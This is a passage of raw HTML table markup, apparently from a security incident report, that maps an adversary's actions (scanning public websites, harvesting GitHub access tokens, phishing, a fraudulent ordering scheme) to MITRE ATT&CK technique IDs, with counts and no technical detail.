SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">internal processes and<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">identified</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">vendor emails to<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">facilitate</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span>their fraudulent ordering scheme.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="638601473" paraeid="{6df0c8d5-ced1-41b8-82d4-3fb270aacd2b}{200}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="3" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="469334538" paraeid="{09772ea6-c54d-4dc0-bb20-bb5c3a18251a}{176}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1710829801" paraeid="{6df0c8d5-ced1-41b8-82d4-3fb270aacd2b}{208}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1595: Active Scanning</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1031757592" paraeid="{6df0c8d5-ced1-41b8-82d4-3fb270aacd2b}{214}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="151711645" paraeid="{6df0c8d5-ced1-41b8-82d4-3fb270aacd2b}{219}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary scanned public-facing websites to understand the target environment.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1224499395" paraeid="{6df0c8d5-ced1-41b8-82d4-3fb270aacd2b}{226}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">2</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="342664166" paraeid="{09772ea6-c54d-4dc0-bb20-bb5c3a18251a}{180}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="845432819" paraeid="{6df0c8d5-ced1-41b8-82d4-3fb270aacd2b}{234}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1593: Search Open Websites/Domains</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="498407150" paraeid="{6df0c8d5-ced1-41b8-82d4-3fb270aacd2b}{241}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary scanned the web to obtain<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Github</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">PATs.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="13455659" paraeid="{6df0c8d5-ced1-41b8-82d4-3fb270aacd2b}{248}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="5" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="2045555532" paraeid="{dbee225e-8d53-4518-b726-68aa4677443b}{42}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Initial access</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:288}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="2127712922" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{23}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1566: Phishing</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1458941534" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{30}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" 